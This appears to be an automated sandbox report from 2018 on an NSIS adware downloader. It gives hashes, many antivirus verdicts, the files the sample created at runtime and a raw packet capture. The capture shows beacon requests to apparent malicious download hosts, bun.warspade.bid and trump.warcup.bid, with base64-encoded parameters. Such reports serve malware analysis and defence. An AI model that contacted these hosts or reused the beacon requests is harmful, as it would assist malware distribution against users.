Analysis Date: 2018-04-09 08:25:35
MD5: adad60d1cb58bf9de083f07d5b4c7a2a
SHA1: 03ca7fb1776a3d3539969ee040a5c9a2478df28c

Static Details:

AV Arcabit (arcavir): Trojan.Generic.22891081
AV Authentium: No Virus
AV Grisoft (avg): Error Scanning File
AV Avira (antivir): TR/Adload.Gen
AV Alwil (avast): Adware-gen [Adw]
AV Alwil (avast): Downloader-WHL [Trj]
AV Ad-Aware: Trojan.Generic.22891081
AV BitDefender: Trojan.Generic.22891081
AV BullGuard: Error Scanning File
AV ClamAV: Error Scanning File
AV Dr. Web: Trojan.AdLoad.86
AV Emsisoft: Trojan.Generic.22891081
AV MicroWorld (escan): No Virus
AV CA (E-Trust Ino): Error Scanning File
AV Fortinet: Error Scanning File
AV Frisk (f-prot): Error Scanning File
AV F-Secure: Trojan.Generic.22891081
AV Ikarus: Error Scanning File
AV K7: Trojan-Downloader ( 005235fd1 )
AV Kaspersky: Error Scanning File
AV MalwareBytes: Trojan.Dropper.NSIS
AV Mcafee: No Virus
AV Microsoft Security Essentials: No Virus
AV NANO: Trojan.Nsis.Adload.etdhkj
AV NANO: Trojan.Nsis.Adload.etdkln
AV Eset (nod32): NSIS/TrojanDownloader.Adload.R
AV Padvish: No Virus
AV CAT (quickheal): Trojan.IGENERIC
AV Rising: Error Scanning File
AV 360 Safe: No Virus
AV SUPERAntiSpyware: No Virus
AV Symantec: No Virus
AV Trend Micro: TROJ_GE.90B3242F
AV Twister: TrojanDldr.Adload.R.igap.arc
AV VirusBlokAda (vba32): TrojanDownloader.AdLoad
AV Windows Defender: No Virus
AV Zillya!: Error Scanning File

Runtime Details:


Process: C:\Windows\System32\lsass.exe

Process: C:\Users\Phil\AppData\Local\Temp\03ca7fb1776a3d3539969ee040a5c9a2478df28c.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\
Creates File: C:\Users\Phil\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Phil\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
Creates File: C:\Users\desktop.ini
Creates File: C:\Users
Creates File: C:\Users\Phil
Creates File: C:\Users\Phil\AppData
Creates File: C:\Users\Phil\AppData\Local
Creates File: C:\Users\Phil\Desktop\desktop.ini
Creates Mutex: (name not captured)
Creates Mutex: (name not captured)

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6c6175 6e63685f 76352e70   GET /launch_v5.p
0x00000010 (00016)   68703f70 3d267069 643d3237 35332674   hp?p=&pid=2753&t
0x00000020 (00032)   69643d31 30383336 35313826 625f7479   id=10836518&b_ty
0x00000030 (00048)   703d7065 266e3d56 484a7661 6d46754a   p=pe&n=VHJvamFuJ
0x00000040 (00064)   5449314d 6a557951 6c4a6c62 5739325a   TI1MjUyQlJlbW92Z
0x00000050 (00080)   58496c4d 6a55794e 544a434e 69343526   XIlMjUyNTJCNi45&
0x00000060 (00096)   7265623d 31266963 3d204854 54502f31   reb=1&ic= HTTP/1
0x00000070 (00112)   2e300d0a 486f7374 3a206275 6e2e7761   .0..Host: bun.wa
0x00000080 (00128)   72737061 64652e62 69640d0a 55736572   rspade.bid..User
0x00000090 (00144)   2d416765 6e743a20 4e534953 444c2f31   -Agent: NSISDL/1
0x000000a0 (00160)   2e322028 4d6f7a69 6c6c6129 0d0a4163   .2 (Mozilla)..Ac
0x000000b0 (00176)   63657074 3a202a2f 2a0d0a0d 0a         cept: */*....

0x00000000 (00000)   47455420 2f657272 6f722e70 68703f73   GET /error.php?s
0x00000010 (00016)   7472696e 673d5a6d 46305957 77734e69   tring=ZmF0YWwsNi
0x00000020 (00032)   78756279 42696457 356b6247 567a4c43   xubyBidW5kbGVzLC
0x00000030 (00048)   7773636d 383d2048 5454502f 312e300d   wscm8= HTTP/1.0.
0x00000040 (00064)   0a486f73 743a2074 72756d70 2e776172   .Host: trump.war
0x00000050 (00080)   6375702e 6269640d 0a557365 722d4167   cup.bid..User-Ag
0x00000060 (00096)   656e743a 204e5349 53444c2f 312e3220   ent: NSISDL/1.2 
0x00000070 (00112)   284d6f7a 696c6c61 290d0a41 63636570   (Mozilla)..Accep
0x00000080 (00128)   743a202a 2f2a0d0a 0d0a0d0a 55736572   t: */*......User
0x00000090 (00144)   2d416765 6e743a20 4e534953 444c2f31   -Agent: NSISDL/1
0x000000a0 (00160)   2e322028 4d6f7a69 6c6c6129 0d0a4163   .2 (Mozilla)..Ac
0x000000b0 (00176)   63657074 3a202a2f 2a0d0a0d 0a         cept: */*....


Strings